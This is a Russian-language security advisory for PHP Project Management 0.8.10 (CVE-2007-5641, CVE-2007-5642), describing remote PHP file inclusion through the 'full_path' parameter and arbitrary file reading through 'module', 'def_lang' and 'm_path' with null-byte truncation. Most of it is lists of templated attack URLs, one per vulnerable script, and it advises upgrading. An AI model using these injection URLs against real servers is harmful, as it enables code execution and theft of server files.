PHP-инклюдинг в PHP Project Management

Дата публикации:
25.10.2007
Дата изменения:
24.03.2009
Всего просмотров:
3155
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2007-5642
CVE-2007-5641
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
Раскрытие системных данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHP Project Management 0.x
Уязвимые версии: PHP Project Management 0.8.10, возможно другие версии.

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "full_path" в различных сценариях. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Примеры:

http://[host]/[path]/ajax/loadsplash.php?full_path=[path2]
http://[host]/[path]/blocks/birthday.php?full_path=[path2]
http://[host]/[path]/blocks/events.php?full_path=[path2]
http://[host]/[path]/blocks/help.php?full_path=[path2]
http://[host]/[path]/modules/certinfo/index.php?full_path=[path2]
http://[host]/[path]/modules/emails/index.php?full_path=[path2]
http://[host]/[path]/modules/events/index.php?full_path=[path2]
http://[host]/[path]/modules/fax/index.php?full_path=[path2]
http://[host]/[path]/modules/files/index.php?full_path=[path2]
http://[host]/[path]/modules/files/list.php?full_path=[path2]
http://[host]/[path]/modules/groupadm/index.php?full_path=[path2]
http://[host]/[path]/modules/history/index.php?full_path=[path2]
http://[host]/[path]/modules/info/index.php?full_path=[path2]
http://[host]/[path]/modules/log/index.php?full_path=[path2]
http://[host]/[path]/modules/mail/index.php?full_path=[path2]
http://[host]/[path]/modules/messages/index.php?full_path=[path2]
http://[host]/[path]/modules/organizations/index.php?full_path=[path2]
http://[host]/[path]/modules/phones/index.php?full_path=[path2]
http://[host]/[path]/modules/presence/index.php?full_path=[path2]
http://[host]/[path]/modules/projects/index.php?full_path=[path2]
http://[host]/[path]/modules/projects/list.php?full_path=[path2]
http://[host]/[path]/modules/projects/summary.inc.php?full_path=[path2]
http://[host]/[path]/modules/reports/index.php?full_path=[path2]
http://[host]/[path]/modules/search/index.php?full_path=[path2]
http://[host]/[path]/modules/snf/index.php?full_path=[path2]
http://[host]/[path]/modules/syslog/index.php?full_path=[path2]
http://[host]/[path]/modules/tasks/index.php?full_path=[path2]
http://[host]/[path]/modules/tasks/searchsimilar.php?full_path=[path2]
http://[host]/[path]/modules/tasks/summary.inc.php?full_path=[path2]
http://[host]/[path]/modules/useradm/index.php?full_path=[path2]

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "full_path" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

3. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "def_lang", "m_path" и "module" в различных сценариях. Удаленный пользователь может с помощью специально сформированного запроса просмотреть содержимое произвольных файлов на системе. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена и опция "magic_quotes_gpc" отключена в конфигурационном файле PHP. Примеры:

http://[host]/[path]/modules/certinfo/index.php?module=[path]%00
http://[host]/[path]/modules/emails/index.php?module=[path]%00
http://[host]/[path]/modules/events/index.php?module=[path]%00
http://[host]/[path]/modules/fax/index.php?module=[path]%00
http://[host]/[path]/modules/files/index.php?module=[path]%00
http://[host]/[path]/modules/files/list.php?def_lang=[path]%00
http://[host]/[path]/modules/groupadm/index.php?module=[path]%00
http://[host]/[path]/modules/history/index.php?module=[path]%00
http://[host]/[path]/modules/info/index.php?module=[path]%00
http://[host]/[path]/modules/log/index.php?module=[path]%00
http://[host]/[path]/modules/mail/index.php?module=[path]%00
http://[host]/[path]/modules/messages/index.php?module=[path]%00
http://[host]/[path]/modules/organizations/index.php?module=[path]%00
http://[host]/[path]/modules/phones/index.php?module=[path]%00
http://[host]/[path]/modules/presence/index.php?module=[path]%00
http://[host]/[path]/modules/projects/index.php?module=[path]%00
http://[host]/[path]/modules/projects/list.php?module=[path]%00
http://[host]/[path]/modules/projects/summary.inc.php?m_path=[path]%00
http://[host]/[path]/modules/reports/index.php?module=[path]%00
http://[host]/[path]/modules/search/index.php?module=[path]%00
http://[host]/[path]/modules/snf/index.php?module=[path]%00
http://[host]/[path]/modules/syslog/index.php?module=[path]%00
http://[host]/[path]/modules/tasks/index.php?module=[path]%00
http://[host]/[path]/modules/tasks/summary.inc.php?m_path=[path]%00
http://[host]/[path]/modules/useradm/index.php?module=[path]%00

URL производителя: phppm.org

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

или введите имя

CAPTCHA